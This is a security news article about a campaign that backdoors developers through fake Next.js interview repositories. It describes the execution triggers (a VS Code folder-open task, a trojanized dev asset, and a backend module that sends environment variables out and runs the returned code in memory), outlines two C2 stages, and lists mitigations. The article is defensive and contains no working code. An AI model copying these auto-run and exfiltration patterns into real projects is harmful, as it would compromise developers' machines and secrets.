Fake Next.js Job Interviews Used to Backdoor Developer Machines

A coordinated campaign is targeting software developers through fake job interviews and technical assessments that contain malicious Next.js repositories. Once cloned and executed, the code enables remote code execution (RCE), data exfiltration, and deployment of additional backdoors.

Attackers are creating fake repositories that appear to be legitimate Next.js projects used in coding tests. Developers receive links as part of supposed technical interviews. After cloning the repository and launching the project, malicious JavaScript executes automatically. The main goal is to achieve remote code execution (RCE), exfiltrate sensitive information, and deploy persistent payloads.

Microsoft Defender identified multiple repositories sharing identical loader logic, naming conventions, and staging infrastructure, indicating a coordinated effort.

Attackers embedded multiple execution triggers:

1. VS Code Trigger

A .vscode/tasks.json file configured with runOn: "folderOpen" executes a Node script when the folder is opened and trusted.

2. Dev Server Trigger

Running npm run dev activates a trojanized asset that decodes a hidden URL, fetches a loader from a remote server, and executes it in memory.

3. Backend Startup Trigger

On backend start, a module decodes a base64 endpoint from .env, sends process.env to the attacker, receives JavaScript in response, and executes it via new Function().

Stage 1

Profiles the host and registers with a command-and-control (C2) server, polling it at fixed intervals.

Stage 2

Connects to a separate C2, retrieves tasks, executes arbitrary JavaScript in memory, and supports:

• file enumeration

• directory browsing

• staged data exfiltration

• process tracking

All performed without writing malicious files to disk.

Microsoft did not disclose details about the attacker or the campaign’s scope. However, structural similarities across repositories indicate a coordinated operation.

Developers should treat standard workflows as high-risk attack surfaces.

Recommended mitigations include:

• Enforcing VS Code Workspace Trust / Restricted Mode

• Applying Attack Surface Reduction (ASR) rules

• Monitoring risky sign-ins via Entra ID Protection

• Minimizing secrets stored on developer endpoints

• Using short-lived tokens with least privilege

This campaign highlights a shift: attackers now target developers directly through everyday workflows. Cloning repositories, running npm scripts, and opening projects in VS Code are now potential infection vectors.

Developer environments have become a new cyber battleground.